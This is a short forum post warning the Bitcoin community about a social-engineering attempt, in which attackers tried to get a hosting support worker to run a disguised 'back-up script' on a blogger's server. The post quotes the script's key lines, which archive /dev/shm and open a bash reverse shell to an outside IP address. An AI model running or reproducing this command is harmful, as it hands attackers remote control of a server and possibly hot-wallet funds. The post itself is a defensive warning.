Author

Topic: Social Engineering attack, probably Bitcoin-driven. (Read 941 times)

hero member
Activity: 756
Merit: 522
Mr P. was hit earlier today, to no actual effect.

While the attackers targetted his blog, the MO may have larger implications for the Bitcoin community, because the attacker was trying to get this script run on the server. The relevant part there is:

Quote
tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-etc.tar.gz /dev/shm
echo "Uploading backed up data."
bash -i >& /dev/tcp/96.43.130.122/80 0>&1

which could perhaps compromise an electrum wallet? (or more generally any hotwallet if /shm is sloppily being used).

This would be a good time for everyone running a hotwallet on a hosted/managed server to review their use of /shm, because you never know when an overworked entry level support person will just run a "back-up script" on your account.
Jump to: